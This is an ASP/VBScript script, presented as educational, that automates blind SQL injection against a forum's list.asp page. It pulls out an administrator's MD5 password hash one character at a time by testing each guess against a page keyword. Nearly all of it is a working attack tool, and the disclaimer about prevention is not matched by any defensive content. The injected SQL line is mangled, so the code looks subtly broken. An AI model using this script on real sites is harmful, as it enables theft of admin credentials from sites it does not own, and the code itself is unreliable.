' Do not use for illegal purposes, this code is just to let the vast number of ASP enthusiasts understand the principle of prevention in the bud.
Function Bytes2bstr (vIn)
Dim Strreturn
Dim I,thischarcode,nextcharcode
Strreturn = ""
For i = 1 to LenB (vIn)
Thischarcode = AscB (MidB (vin,i,1))
If Thischarcode < &h80 Then
Strreturn = Strreturn & Chr (Thischarcode)
Else
Nextcharcode = AscB (MidB (vin,i+1,1))
Strreturn = Strreturn & Chr (CLng (thischarcode) * &h100 + CInt (nextcharcode))
i = i + 1
End If
Next
Bytes2bstr = Strreturn
End Function
function gethttppage (URL)
Dim http
Set Http=createobject ("MSXML2. XMLHTTP ")
Http.open "Get", Url,false
Http.send ()
If Http.readystate<>4 Then
Exit function
End If
Gethttppage=bytes2bstr (Http.responsebody)
Set http=nothing
If Err.number<>0 then err. Clear
End Function
Function regexptest (PATRN, STRNG)
Dim regEx, RetVal ' Set variable.
Set regEx = New RegExp ' establishes a regular expression.
Regex.pattern = Patrn ' Set mode.
Regex.ignorecase = False ' Sets whether case sensitive.
Regexptest = regex.test (strng) ' performs a search test.
End Function
Password= ""
keyword= "Forum Home" ' Returns the string that appears on the correct page
url1= "http://qq/bbs/list.asp?boardid=7" SQL injection Portal
Passlen=32 ' MD5 password is usually 32-bit
Dim Pass
Pass=array (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102) ' Password values are usually 0-9,a-f
Server. scripttimeout=999
For I=1 to Passlen
Flag=false
url=url1& "and" (select ASC (Password, &i&, 1)) from admin where id>0) = "' Constructed SQL statement here's the key.
For J=0 to UBound (pass)
Str=gethttppage (Url&pass (j))
Flag=regexptest (KEYWORD,STR)
If Flag=true Then
PASSWORD=PASSWORD&CHR (Pass (j))
Exit For
End If
Next
Next
Response. Write (password)
